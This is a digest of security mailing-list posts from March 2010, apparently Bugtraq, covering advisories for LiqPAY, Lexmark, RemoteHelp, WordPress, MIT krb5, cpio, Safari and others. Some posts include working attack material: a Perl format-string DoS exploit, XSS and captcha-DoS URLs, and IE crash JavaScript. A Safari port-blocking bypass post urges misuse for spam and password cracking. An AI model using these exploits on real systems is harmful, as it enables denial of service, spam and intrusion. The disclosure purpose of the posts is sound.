Insecure SMS authorization scheme at LiqPAY micro-payments of PrivatBank (Ukraine)

2010-03-23 Thread Andriy Tereshchenko
1) Affected Service

* LiqPAY micro-payment system from PrivatBank, Ukraine

2) Severity

Rating: Moderate (need user actions)
Impact: Exposure of sensitive financial information and unauthorized
access to system
Where:  Remote (man-in-the-middle)

3) Vendor's Description of Service

"LiqPAY is global open high-secure payment system that lets anyone
easily send money using mobile phones, Internet and payment cards
worldwide.
...
LiqPAY Benefits: Strong security. Strong identification and
verification using the OTP technology."

Product Link:
https://www.liqpay.com/?do=pages&p=productliqpay


4) Description of Vulnerability

LiqPAY one-time-password technology is based on SMS messages sent to
mobile phone of registered user. In order to login user has to submit
his mobile phone number on web-form and will be prompted for 8-digits
password from SMS message sent by system to his mobile.

Vulnerability is that SMS messages are not tagged in any way that they
are from LiqPAY system.
SMS message text is like "Parol: 12345678 --Do not pass your password
to third party.".

Exploitation is following - attacker can setup web-site (or any other
service) that will ask user for their mobile phone numbers first, then
for password they has received. In fact, attacker is not sending SMS
on his own, but request LiqPAY system to send one to user.  After user
will type in password he has received in SMS message on attacker
website - attacker can use this password to login into LiqPAY system.

After login to LiqPAY - all services of system are available to
attacker - history of previous payments and sending of digital money.

5) Solution

SMS messages from LiqPAY system should be tagged properly in order to
allow users clearly identify service and website URL of SMS origin.

Temporary solution for current users - do not answer on all SMS
messages similar in format to LiqPAY one's (there 8-digit password is
used).

6) Time Table

18:16 EET 22 March 2010 - Issue reported in public to vendor
(Alexander Vityaz blog, Head of Center E-business at Privatbank)
18:22 - Vendor denial as non-issue

7) Credits

Discovered by client of PrivatBank.

8) About LiqPay and PrivatBank

The Commercial bank PrivatBank (Ukraine) was founded in 1992. Its
services are used by more than 23% population of Ukraine population.
PrivatBank currently serves 420 thousand corporate clients and small
businesses, and over 13 million individual accounts.

LiqPAY is system invented by PrivatBank company for micropayments. It
is actively pushed to clients of PrivatBank.
All ~3000 branches of bank issue micropayments vouchers or open
accounts of LiqPAY system instead of giving change in coins to most of
it's clients then bank services or wire payments are requested. Number
of LiqPAY users as result of this effort claimed to be over 120
thousands.


{PRL} Lexmark Multiple Laser printer FTP Remote Denial of Services

2010-03-23 Thread Francis Provencher
#

Application:   Lexmark Multiple Laser Printer FTP Remote Denial of Services

Platforms:   Lexmark Multiple Laser printer

Exploitation:   Remote Exploitable

CVE Number:   CVE-2010-0618

Discover Date:   2010-01-06

Author:   Francis Provencher (Protek Research Lab's)

Website:   http://www.protekresearchlab.com


#

1) Introduction
2) Report Timeline
3) Technical details
4) Products affected
5) The Code

#

=
1) Introduction
=

Lexmark specializes in printers and printer accessories. Its current
range of products includes color and monochrome laser printers and
inkjet printers, both of which may include scanners (including
all-in-one devices with faxing and copying capabilities and photo
printers), and dot matrix printers. Lexmark was one of the first
companies to release wifi inkjet printers and the very first to
release printers with a web-enabled touchscreen, coming in early
September of 2009. They also offer a wide variety of laser printers
with software solutions for more professional printing environments.

(Wikipedia)

#


2) Report Timeline


2010-01-06  Vendor Contacted
2010-01-09  Vendor Response
2010-01-09  Vendor request a PoC
2010-01-10  PoC is sent to the vendor
2010-01-12  Vendor confirme they received PoC
2010-01-13  Vendor confirm the vulnerability
2010-03-22  Public release of this advisory

#

==
3) Technical details
==

Lexmark products have connection flood protection mechanisms that
limit the number of simultaneous network
connections that can be made to the device on most TCP service ports.
(21/FTP 79/Finger, 515/LPD, 631/IPP,
5001, 9100-9104, 9200, 9300, 9400, 9500-9501 & 9600) The FTP service
exception handler does not properly
maintain the state of the flood protection when passive FTP
connections are aborted. Once a sufficient number
of passive FTP connections have timed out (typically 15), the flood
protection is enabled and is never reset.
The flood protection can be reset by resetting the network adapter, or
by power cycling the device.


#

=
4) Product affected
=

The list is too long, you can found information on the Lexmark web site;

http://support.lexmark.com/alerts


#

=
5) The Code
=

No proof of concept code are required.

#
(PRL-2010-02)


Re: Firefox 3.6 for Windows includes a forged CA cert

2010-03-23 Thread Marcus Meissner
On Fri, Mar 19, 2010 at 08:22:16PM +, Francis Litterio wrote:
> In Firefox 3.6 for Windows, go to Tools -> Options -> Advanced -> Encryption 
> ->
> View Certificates -> Authorities and scroll down to the entry for "Equifax
> Secure Inc." and you'll see a cert labeled "MD5 Collisions Inc
> (http://www.phreedom.org/md5)" grouped with the other Equifax certs.
> 
> Yes, it's expired, so it poses no real threat, but why is the Mozilla Project
> shipping Firefox with that cert?  It just causes FUD.

https://bugzilla.mozilla.org/show_bug.cgi?id=471715 is the associated mozilla 
bug.

seems intentional.

Ciao, Marcus


[CORELAN-10-015] - Remote Help 0.0.7 Httpd DoS (Format String)

2010-03-23 Thread Security

|--|
| __   __  |
|   _    / /___ _ / /   _ ___  |
|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
| \___/\/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
|  |
|   http://www.corelan.be:8800 |
|  secur...@corelan.be |
|  |
|-[ EIP Hunters ]--|
|  |
| Vulnerability Disclosure Report  |
|  |
|--|

Advisory: CORELAN-10-015
Disclosure date : March 20, 2010
http://www.corelan.be:8800/index.php/forum/security-advisories/remote-help-httpd-denial-of-service/



0x00 : Vulnerability information


[*] Product : RemoteHelp
[*] Version : 0.0.7
[*] Vendor : http://hipernes.sdf-eu.org/
[*] URL : http://hipernes.sdf-eu.org/
[*] URL : 
http://www.softpedia.com/progDownload/Remote-Help-Download-144888.html 
[*] URL : http://sourceforge.net/projects/remotehelp 
[*] Platform : Windows XP
[*] Type of vulnerability : Format String 
[*] Risk rating : Low/Medium
[*] Issue fixed in version : Unknown
[*] Vulnerability discovered by : Rick2600
[*] Corelan Team : 
http://www.corelan.be:8800/index.php/security/corelan-team-members/


0x01 : Vendor description of software
-
>From the vendor website:

RemoteHelp is a minimal http server that allows to view and control a remote pc 
running a 32-bits

version of Microsoft Windows. It is only one file without any configuration 
file and now include

webcam support, new interface and new features...



0x02 : Vulnerability details

The discovered vulnerability allows an attacker to cause denial of service in 
the aplication by sending a
malicious request containing format string specifier. Remote code execution may 
be possible. 

EAX 41424344
ECX 00E7F818
EDX 
EBX 006E
ESP 00D3F2FC ASCII "0..."
EBP 00D3F550
ESI 0001
EDI 00D3FE27 ASCII "XDCBA>"
EIP 00414DFC httpd_0_.00414DFC



0x03 : Vendor communication
---
01 feb 2010 : Vendor contacted - no reply 
20 mar 2010 : Public disclosure


0x04 : Exploit/PoC
--
# Exploit Title : Remote Help 0.0.7 Remote DoS
# Date  : 20 Mar 2010
# Author: Rick2600 (ricks2600[at]gmail{dot}com)
# Bug found by  : Rick2600
# Software Link : 
http://www.softpedia.com/progDownload/Remote-Help-Download-144888.html
# Version   : 0.0.7
# OS: Windows
# Tested on : XP SP2 En
# Type of vuln  : DoS
# Greetz to : Corelan Security Team : 
http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
#
# Code :
print "|--|\n";
print "| __   __   |\n";
print "|   _    / /___ _ / /   _ ___  |\n";
print "|  / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\   / __/ _ \\/ __ `/ __ `__ \\ 
|\n";
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |\n";
print "| \\___/\\/_/   \\___/_/\\__,_/_/ /_/   \\__/\\___/\\__,_/_/ /_/ /_/ 
 |\n";
print "|  |\n";
print "|   http://www.corelan.be:8800 |\n";
print "|  |\n";
print "|-[ EIP Hunters 
]--|\n\n";
print "[+] DoS exploit for Remote Help 0.0.7 Http\n";

use IO::Socket; 

if ($#ARGV != 0) { 
print $#ARGV;
print "\n  usage: $0 \n"; 
exit(0); 
} 


print "[+] Connecting to server $ARGV[0] on port 80\n\n";

$remote = IO::Socket::INET->new( Proto => "tcp",
 PeerAddr  => $ARGV[0],
 PeerPort  => "http(80)",
);
unless ($remote) { die "Cannot connect to Remote Help daemon on $ARGV[0]\n" }
print "[+] Connected!\n";


#CONTROL EAX
$payload = "/index.html" . "%x" x 90 . "A" x 250 . "%x" x 186  ."%.99x" x 
15 ."%.19x"  . "%nX" . "DCBA";


print "[+] Sending Malicious Request\n";
print $remote "GET $payload HTTP/1.1\r\n";
close $remote;










Aris AGX agXchange ESM Cross Site Scripting Vulnerability

2010-03-23 Thread lament
=

Yaniv Miron aka "Lament" Advisory March 12, 2010

Aris AGX agXchange ESM Cross Site Scripting Vulnerability

=



=

I. BACKGROUND

=



E2B safety submissions module.



When it comes to the electronic submission of safety data using the E2B format,

meeting the often complicated and complex requirements from different regulatory

agencies—EMEA, MHLW, FDA and other NCAs—can be a challenge that consumes

vast amounts of time, effort and resources.



http://www.arisglobal.com/products/agxchange_esm.php





=

II. DESCRIPTION

=



A malicious attacker may inject scripts into the agXchange ESM module in the 
Aris AGX application.



=

III. ANALYSIS

=



Exploitation of this vulnerability results in the execution of arbitrary

code using a malicious link.



=

IV. EXPLOIT

=



http://www.example.com/[agx_application]/pages/ucquerydetails.jsp?QueryID=>%22%27>



=

V. DISCLOSURE TIMELINE

=



Jan 2009 Vulnerability found

Jan 2009 Vendor Notification

March 2010 Public Disclosure



=

VI. CREDIT

=



Yaniv Miron aka "Lament".

lam...@ilhack.org


MITKRB5-SA-2010-002 denial of service in SPNEGO [CVE-2010-0628 VU#839413]

2010-03-23 Thread Tom Yu
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

MITKRB5-SA-2010-002

MIT krb5 Security Advisory 2010-002
Original release: 2010-03-23
Last update: 2010-03-23

Topic: denial of service in SPNEGO

CVE-2010-0628
VU#839413
denial of service in SPNEGO

CVSSv2 Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C/E:POC/RL:OF/RC:C

CVSSv2 Base Score:  7.8

Access Vector:  Network
Access Complexity:  Low
Authentication: None
Confidentiality Impact: None
Integrity Impact:   None
Availability Impact:Complete

CVSSv2 Temporal Score:  6.1

Exploitability: Proof-of-Concept
Remediation Level:  Official Fix
Report Confidence:  Confirmed

SUMMARY
===

In MIT krb5 releases krb5-1.7 and later, the SPNEGO GSS-API mechanism
can experience an assertion failure when receiving certain invalid
messages. This can cause a GSS-API application to crash.

This is an implementation vulnerability in MIT krb5, and not a
vulnerability in the Kerberos protocol.

IMPACT
==

An unauthenticated remote attacker could cause a GSS-API application,
including the Kerberos administration daemon (kadmind) to crash.

AFFECTED SOFTWARE
=

* kadmind in MIT releases krb5-1.7 and later

* FTP daemon in MIT releases krb5-1.7 and later

* Third-party software using the GSS-API library from MIT krb5
  releases krb5-1.7 and later

* MIT releases prior to krb5-1.7 did not contain the vulnerable code.

FIXES
=

* The upcoming krb5-1.7.2 and krb5-1.8.1 releases will contain fixes
  for this vulnerability.

* Apply the patch available at

  http://web.mit.edu/kerberos/advisories/2010-002-patch.txt

  A PGP-signed patch is available at

  http://web.mit.edu/kerberos/advisories/2010-002-patch.txt.asc

REFERENCES
==

This announcement is posted at:

  http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2010-002.txt

This announcement and related security advisories may be found on the
MIT Kerberos security advisory page at:

http://web.mit.edu/kerberos/advisories/index.html

The main MIT Kerberos web page is at:

http://web.mit.edu/kerberos/index.html

CVSSv2:

http://www.first.org/cvss/cvss-guide.html
http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2

CVE: CVE-2010-0628
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0628

CERT: VU#839413
http://www.kb.cert.org/vuls/id/839413

ACKNOWLEDGMENTS
===

Thanks to Nalin Dahyabhai, Jan iankko Lieskovsky, and Zbysek Mraz (all
from Red Hat) for discovering and reporting this vulnerability.

CONTACT
===

The MIT Kerberos Team security contact address is
.  When sending sensitive information,
please PGP-encrypt it using the following key:

pub   2048R/8B8DF501 2010-01-15 [expires: 2011-02-01]
uid MIT Kerberos Team Security Contact 

DETAILS
===

A patch to fix CVE-2009-0845 interacted poorly with new functionality
introduced in krb5-1.7.  This allowed an error condition to occur
where receiving an invalid packet could cause an assertion failure,
crashing the program and causing denial of service.

When the spnego_gss_accept_sec_context() function (in
src/lib/gssapi/spnego/spnego_mech.c) receives an invalid packet during
the beginning of a GSS-API protocol exchange, it can set some internal
state that tells it to send an error token without first creating a
context handle, but some subsequently executed code contains a call to
assert() that requires that the context handle be non-null.

REVISION HISTORY


2010-03-23  original release

Copyright (C) 2010 Massachusetts Institute of Technology
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.8 (SunOS)

iEYEARECAAYFAkupAZsACgkQSO8fWy4vZo4ETACgn9xRUl3CTCiRd2vF1PBOaQ8b
EfUAoPz32NUU/mk+H8kej8fWQFo3iwcZ
=LHMP
-END PGP SIGNATURE-


Vulnerabilities in WordPress

2010-03-23 Thread MustLive

Hello Bugtraq!

I want to warn you about vulnerabilities in WordPress.

-
Advisory: Vulnerabilities in WordPress
-
URL: http://websecurity.com.ua/4016/
-
Timeline:

02.03.2010 - found the vulnerabilities.
02.03.2010 - didn't informed developers. After I informed WP developers
about multiple vulnerabilities in WordPress in December 2007 and they
ignored them - some didn't fix and some hiddenly fixed, without thanking me
and referencing me (they even didn't mention about those fixed holes in
release notes on official site) - starting from 2008 I never more inform
them about vulnerabilities in WordPress. These holes were posted to Bugtraq
(http://www.securityfocus.com/archive/1/archive/1/485786/100/0/threaded).
09.03.2010 - disclosed at my site.
-
Details:

These are Brute Force and Insufficient Authorization vulnerabilities.

Earlier in 2008 I already wrote about Brute Force vulnerability in WordPress
(http://websecurity.com.ua/2007/), which was found by Kad already in 2007
(http://securityvulns.ru/Pdocument580.html). And as I found at 02.03.2010 in
WordPress 2.9.2 this vulnerability still wasn't fixed. And also I found new
vulnerabilities in WP.

Brute Force:

There is no protection from picking up of a password (from Brute Force
attacks) in function of protecting pages/posts by a password.

Insufficient Authorization:

At every page/post in WP it's possible to set a password and these passwords
can be equal. But function of accessing by a password writes global cookie,
which works for the whole site. And so, after setting the password one time
for one page/post, it's possible to see all protected pages/posts (with the
same password, even without knowing that the password matches), because at a
request to them the access will be granted automatically.

Vulnerable are WordPress 2.9.2 and previous versions (all 2.x versions). I
tested in different versions of WP, particularly in 2.0.11 and 2.9.2.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua



[ MDVSA-2010:065 ] cpio

2010-03-23 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:065
 http://www.mandriva.com/security/
 ___

 Package : cpio
 Date: March 23, 2010
 Affected: 2008.0, 2009.0, 2009.1, 2010.0, Corporate 4.0,
   Enterprise Server 5.0, Multi Network Firewall 2.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in cpio and tar:
 
 Heap-based buffer overflow in the rmt_read__ function in lib/rtapelib.c
 in the rmt client functionality in GNU tar before 1.23 and GNU cpio
 before 2.11 allows remote rmt servers to cause a denial of service
 (memory corruption) or possibly execute arbitrary code by sending more
 data than was requested, related to archive filenames that contain a :
 (colon) character (CVE-2010-0624).
 
 The Tar package as shipped with Mandriva Linux is not affected
 by this vulnerability, but it was patched nonetheless in order to
 provide additional security to customers who recompile the package
 while having the rsh package installed.
 
 Packages for 2008.0 are provided for Corporate Desktop 2008.0
 customers.
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0624
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 56cdfb4e12affc6594049570fb8d35ce  2008.0/i586/cpio-2.9-2.2mdv2008.0.i586.rpm
 705c2df54a9920908909423da574b32d  2008.0/i586/tar-1.18-1.2mdv2008.0.i586.rpm 
 596789a93702aecd07562281c9d48f78  2008.0/SRPMS/cpio-2.9-2.2mdv2008.0.src.rpm
 b1a645b471280fa0e51c38aedfa504aa  2008.0/SRPMS/tar-1.18-1.2mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 d7eaf79ca34d67b5f152372813254cb1  
2008.0/x86_64/cpio-2.9-2.2mdv2008.0.x86_64.rpm
 2c97f01252660e80b9d00b7ebd7815e5  
2008.0/x86_64/tar-1.18-1.2mdv2008.0.x86_64.rpm 
 596789a93702aecd07562281c9d48f78  2008.0/SRPMS/cpio-2.9-2.2mdv2008.0.src.rpm
 b1a645b471280fa0e51c38aedfa504aa  2008.0/SRPMS/tar-1.18-1.2mdv2008.0.src.rpm

 Mandriva Linux 2009.0:
 a3058108cddda8dde95b20b9be7d2aae  2009.0/i586/cpio-2.9-5.1mdv2009.0.i586.rpm
 8af041a2f14d3ea6761eb1ec77fa4964  2009.0/i586/tar-1.20-7.1mdv2009.0.i586.rpm 
 93f6cecaa13c9b3495721592305e1339  2009.0/SRPMS/cpio-2.9-5.1mdv2009.0.src.rpm
 a755272047ac5cb179a5c294057154cd  2009.0/SRPMS/tar-1.20-7.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 ab93a4d266e37076e233aa2367a8c478  
2009.0/x86_64/cpio-2.9-5.1mdv2009.0.x86_64.rpm
 67ed3f23bcc8a8b633cbd8c8d7b9516b  
2009.0/x86_64/tar-1.20-7.1mdv2009.0.x86_64.rpm 
 93f6cecaa13c9b3495721592305e1339  2009.0/SRPMS/cpio-2.9-5.1mdv2009.0.src.rpm
 a755272047ac5cb179a5c294057154cd  2009.0/SRPMS/tar-1.20-7.1mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 2d0eeca73eb44a8c7e41c50fd4c20add  2009.1/i586/cpio-2.9-6.1mdv2009.1.i586.rpm
 3cff4bb92b1ca2e074e1382f555bf7bc  2009.1/i586/tar-1.21-2.1mdv2009.1.i586.rpm 
 b5be5792c0e7e74eae6c373a40dd  2009.1/SRPMS/cpio-2.9-6.1mdv2009.1.src.rpm
 a5ed5628ea098b1687cd432aff6adb38  2009.1/SRPMS/tar-1.21-2.1mdv2009.1.src.rpm

 Mandriva Linux 2009.1/X86_64:
 d15356d257890237b4176c3206f03b4d  
2009.1/x86_64/cpio-2.9-6.1mdv2009.1.x86_64.rpm
 edd4211deb588b7b649606e8585bd15a  
2009.1/x86_64/tar-1.21-2.1mdv2009.1.x86_64.rpm 
 b5be5792c0e7e74eae6c373a40dd  2009.1/SRPMS/cpio-2.9-6.1mdv2009.1.src.rpm
 a5ed5628ea098b1687cd432aff6adb38  2009.1/SRPMS/tar-1.21-2.1mdv2009.1.src.rpm

 Mandriva Linux 2010.0:
 bbe43728f9f8db2ceabba5dcb375e4a7  2010.0/i586/cpio-2.10-1.1mdv2010.0.i586.rpm
 d5f150a07bf5fb6e6918b49f80742031  2010.0/i586/tar-1.22-2.1mdv2010.0.i586.rpm 
 f3379cc3d9787bda215d08dd56d33e3c  2010.0/SRPMS/cpio-2.10-1.1mdv2010.0.src.rpm
 d6f6ed62e6c1cc2bf1761408427ff0a1  2010.0/SRPMS/tar-1.22-2.1mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 9bbaba5025e46793b44503684fe963a3  
2010.0/x86_64/cpio-2.10-1.1mdv2010.0.x86_64.rpm
 965f38e0f6d386e02d6a174f84871dd9  
2010.0/x86_64/tar-1.22-2.1mdv2010.0.x86_64.rpm 
 f3379cc3d9787bda215d08dd56d33e3c  2010.0/SRPMS/cpio-2.10-1.1mdv2010.0.src.rpm
 d6f6ed62e6c1cc2bf1761408427ff0a1  2010.0/SRPMS/tar-1.22-2.1mdv2010.0.src.rpm

 Corporate 4.0:
 f614d9c66ae80c195bff9126e1755284  
corporate/4.0/i586/cpio-2.6-5.2.20060mlcs4.i586.rpm
 2ab8ec94b6e698122a2965bc942f4507  
corporate/4.0/i586/tar-1.15.1-5.5.20060mlcs4.i586.rpm 
 3ea902eef3045f53fc5731cd7d2ae9bd  
corporate/4.0/SRPMS/cpio-2.6-5.2.20060mlcs4.src.rpm
 c4eb72165f7f6e82b8fa1e61f03ae8d8  
corporate/4.0/SRPMS/tar-1.15.1-5.5.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 459a97a9a72f94a331f71a3ab7364d73  
corporate/4.0/x86_64/cpio-2.6-5.2.20060mlcs4.x86_64.rpm
 f6f389f792d26da8599ca3f52337bfda  
corporate/4.0/x86_64/tar-1.15.1-5.5.20060mlcs4.x86_64.

Vulnerabilities in CaptchaSecurityImages

2010-03-23 Thread MustLive

Hello Bugtraq!

I want to warn you about security vulnerabilities in CaptchaSecurityImages.
It's captcha script which is using at many web sites and engines.

-
Advisory: Vulnerabilities in CaptchaSecurityImages
-
URL: http://websecurity.com.ua/4043/
-
Timeline:
06.10.2007 - found Insufficient Anti-automation vulnerability, during
conducting of my project Month of Bugs in Captchas
(http://websecurity.com.ua/category/mobic/).
17.09.2009 - found Denial of Service vulnerability.
17.03.2010 - disclosed at my site.
18.03.2010 - informed developers.
-
Details:

These are Insufficient Anti-automation and Denial of Service
vulnerabilities.

Insufficient Anti-automation:

Parameters characters, width and height fall under manipulation in the
captcha. They can be set in such way, that will allow easy bypass of the
captcha via half-automated or automated (with using of OCR) methods. And in
some systems (http://websecurity.com.ua/4046/) it's also possible to use
session reusing with constant captcha bypass method.

http://site/CaptchaSecurityImages.php?width=150&height=100&characters=2

In that way it's possible to set two characters and increase the size of the
captcha.

DoS:

http://site/CaptchaSecurityImages.php?width=1000&height=9000

With setting of large values of width and height it's possible to create
large load at the server.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua



Safari browser port blocking bypassed by integer overflow

2010-03-23 Thread Gary Niger

 g . o . a . t . s . e   s  . e . c . u . r . i . t . y 
  g . a . p . i . n . g   h . o . l . e . s  e . x . p . o . s . e . d
 http://security.goatse.fr/
   (323) 306-4576 


attention: due to technical limitations, this advisory cannot be displayed 
correctly. to view with images and video, visit the following page: 
http://encyclopediadramatica.com/Safari_XPS_Attack 
warning: some of the content on this link may offend you and your employer.

We at the Goatse Security labs have been delving into an old (but also new)
class of web exploits originally coined cross-protocol scripting, but now more
commonly referred to as inter-protocol exploitation. 

Goatse Security has a double feature for you, starting with a 0day vuln:

* Safari (and other webkit-based)browser port blocking bypassed by integer 
overflow

and a technique that, as far as I know, has not been premiered before:

* XHR (XMLHttpRequest) as a vector for mail merging or wordlist attacks in
   XPS/IPE attacks

We're going to show you how these two methods combine like Voltron into a whole
much larger than its parts. At the end of this short advisory you will be able
to take any Safari web browser and make it a spam drone, a wordlist-based logon
cracker for networks, or a relay for payloads to arbitrary daemons. You will be
able to do all of this without passing any shellcode or alerting any IDS to
compromise. 

Let's cover the bug.

First, I would like to give credit to my cat, Gary C. Berries, as the initial
researcher to uncover this bug. Without my cat's assistance as an enterprise
class keyboard-based integer fuzzer this vulnerability would have been left 
unearthed.

Apple is going to learn several lessons here, the most important of which is 
probably not to let an unsigned short pose as anything other than an unsigned 
short. Open up a Safari browser on your favorite chode-sniffing operating 
system. Go to a "banned" port like 25 and you'll get an error:

___Not allowed to use restricted network port___ (WebKitErrorDomain:103) 

Add 65536 to 25 to make 65561 and revisit the site on this new port-- no such
cockblocking. You're good to go. You can now use the Safari web browser as a
device to hit any port on any address with a cross-protocol scripting attack.

HOWTO video! http://vimeo.com/10302434

List of Webkit-based browsers found to be affected:
OS X Safari
iPhone/iPod Safari
iPad Safari (confirmed with iPad Simulator in SDK 3.2 beta 4 w/ XCode 3.2.2)
Arora
iCab
OmniWeb
Stainless

The only Webkit-based browser found to not be vulnerable:
Google Chrome

For all Apple's talk of "think different" the only one actually doing so in
regards to browser security is Google. XSS, XPS/IPE, all the traditional
methods fail against Chrome. Google, I don't even care that you are the most
ruthlessly evil corporation in existence anymore. Your stuff just works. You
had me sold at functional reliability. There was a time in my life that I had
large concern about corporate ethics. Now I know that all corporations are
evil. Some more than others. The one who is evil and smart will only ruin you
with malice, where the one that is evil and stupid can ruin you out of both
malice and out of sheer incompetence.

To give this exploit a little of that "je ne sais quoi", we need to come up 
with a good attack vector. Now we're going to show you how Apple didn't just
unearth a decade-old vulnerability and make it viable again a la Microsoft, it
actually becomes more viable to exploit in this new generation than it was at
the time of its inception. When cross-protocol scripting was born, Javascript
was pretty young. There wasn't a whole lot you could do with it then--any bits
of Javascript now called AJAX wouldn't be a cross-browser standard until 2004.

So I looked at this integer overflow and I thought to myself what exactly I'd 
find this useful for. The answers I came up with were:

* Getting idiot Mac-using creative people at bulk mailing companies to click
   on links which spew SMTP envelopes at their internal mailserver, thereby
   utilizing someone else's email reputation to send CPA offers of my own.
* Bruteforcing device passwords via a wordlist and then phoning home
* Reflashing network devices with firmware more fun than the factory default
* Relay exploit payloads to non-HTTP daemons on arbitrary TCP ports
* Get a Safari web browser to do pretty much anything on any TCP port and not
   have any current IDS/IPS in existence be any wiser for it.

We summarily implemented all of these things, but I'm going to show you how to
do the first one since the code is trivially altered to do many of the others.
Also because it is the most fun and easy way to monetize this particular vuln,
and I'm hoping other people will make use of it before Apple patches!

(The best part of our first cross-protocol scripting PoC release:
http://encyclopediadramatica.com/Firefox_X

Re: Vulnerability Astaro Security Linux v5

2010-03-23 Thread Akos Szalkai
Astaro v5 has been end-of-life since October 2007.  Even v6 is EOL
(since October 2009).

Akos

-- 
Akos Szalkai 
Principal IT Consultant, CISA
2F 2000 Szamitastechnikai es Szolgaltato Kft.
Tel: (+36-1)-4887700  Fax: (+36-1)-4887709  WWW: http://www.2f.hu/



[HITB-Announce] HITBSecConf2009 - Malaysia Videos Released!

2010-03-23 Thread Hafez Kamal

The videos from the 7th annual Hack in The Box security conference held
in Malaysia last year have been released! On a related note, do keep in
mind that online registration for HITBSecConf2010 - Dubai closes in less
than 4 weeks and the Call for Papers for HITBSecConf2010 - Amsterdam is
still open for submissions (Submissions are due no later than 19th April 2010)!

HITB CFP
http://cfp.hackinthebox.org/

===

HITB Videos
http://video.hitb.org/

DL - Torrent - Day 1
http://video.hitb.org/hitbsecconf2009malaysia-day1.torrent

DL - Torrent - Day 2
http://video.hitb.org/hitbsecconf2009malaysia-day2.torrent

Presentation Materials
http://conference.hitb.org/hitbsecconf2009kl/materials/



Keynote 1: Joe Grand (President, Grand Idea Studio)
Keynote 2: Rop Gonggrijp (Hacker and Activist)
Keynote 3: Ed Skoudis (Co-Founder, InGuardians)
Keynote 4: Julian Assange (Founder of WikiLeaks.org)

Presentations By:

1.) Alex 'kuza55' Kouzemtchenko (Associate Consultant, statsec)

2.) Alexander Gazet (Sogeti ESEC Research & Development)

3.) Andrea Barisani (Chief Security Engineer, Inverse Path)

4.) Babak Javadi (TOOOL USA)

5.) Bruno Goncalves de Oliveira (Computer Engineer, iBLISS)

6.) Chris Evans (Information Security Engineer/Troublemaker/Chrome
Security, Google Corp)

7.) Damien Aumaitre (Sogeti)

8.) Daniele Bianco (Hardware Hacker, Inverse Path)

9.) Deviant Olam (TOOOL USA)

10.) Dimitrios Petropoulos (Managing Director, ENCODE Middle East)

11.) Frédéric Raynal (Head of Research & Software Development,
Sogeti/Cap Gemini)

12.) Guillaume Delugré (Sogeti)

13.) Haroon Meer (Technical Director, Sensepost)

14.) Job De Haas (Riscure)

15.) Julien Tinnes (Information Security Engineer, Google Corp)

16.) Justin Lundy (Founder & CEO, Subterrain)

17.) Lee Chin Sheng (Independent Network Security Researcher)

18.) Lucas Adamski (Director, Security Engineering, Mozilla Corp)

19.) Malaysian Amateur Radio Emergency Service (MARES)

20.) Mark Dowd (ISS)

21.) Meling Mudin (Founder, security.org.my)

22.) Nguyen Anh Quynh (Researcher, Japan Institute of Advanced
Industrial Science and Technology)

23.) Nishad Herath (CEO, Novologica)

24.) Paul Theriault (Consultant, SIFT)

25.) Saumil Shah (Founder, Net-Square)

26.) Sheran Gunasekera (Head of Research & Development, ZenConsult)

27.) Steve Anson (Director, Forward Discovery)

28.) Tavis Ormandy (Information Security Engineer, Google Corp)

29.) Wes Brown (Security Consultant, IOActive)

30.) Yoann Guillot (Sogeti ESEC Research & Development)


---
Hafez Kamal
HITB Crew
Hack in The Box (M) Sdn. Bhd.
Suite 26.3, Level 26, Menara IMC,
No. 8 Jalan Sultan Ismail,
50250 Kuala Lumpur,
Malaysia

Tel: +603-20394724
Fax: +603-20318359



Re: Vulnerability Astaro Security Linux v5

2010-03-23 Thread jdaniel
Astaro Security Linux V5 is obsolete and past EOL.  V5 has not been supported 
in years.  Customers are encouraged to run current software.


Re: IE 6.0 - Local Crash Exploit

2010-03-23 Thread Veg

Spot the difference:

###
5QIM 2.0.0.9 IE Crash Exploit
2008-02-25 08:26

style="display:none;">



function crash() {
var buff = '';
for(i=0;i<=5000;i++) {buff+="AA";}
object = document.getElementById("xiaonei");
object.Start5QIMWithItv('test','test',buff);
}


Crash...


###
and:

On Sat, 20 Mar 2010, i...@securitylab.ir wrote:


###
# Securitylab.ir
###
Vul:




function crash() {
var buff = '';
for(i=0;i<=5000;i++) {buff+="AA";}
object = document.getElementById("opi");
object.Start5QIMWithItv('test','test',buff);
}


.!.

###
# IE 6.0 Local Crash Exploit , By: Pouya Daneshmand 
(whh_i...@yahoo.com,Pouya.Securitylab.ir)
###


Yep - the date, the object name and the attribution.

http://hi.baidu.com/flyhat/blog/item/64e6a700a59c5015728b6518.html


MX Simulator Server 2010-02-06 Remote Buffer Overflow PoC

2010-03-23 Thread Salvatore Fresta aka Drosophila
MX Simulator Server is affected by a remote stack overflow. This bug
was found by Luigi Auriemma.

A Proof of Concept can be found on the following link:
http://www.salvatorefresta.net/files/poc/PoC-MXSimulatorServer2010-02-06.zip


-- 
Salvatore Fresta aka Drosophila
http://www.salvatorefresta.net
CWNP444351


[DSECRG-09-064] SAP GUI - Insecure method, code execution

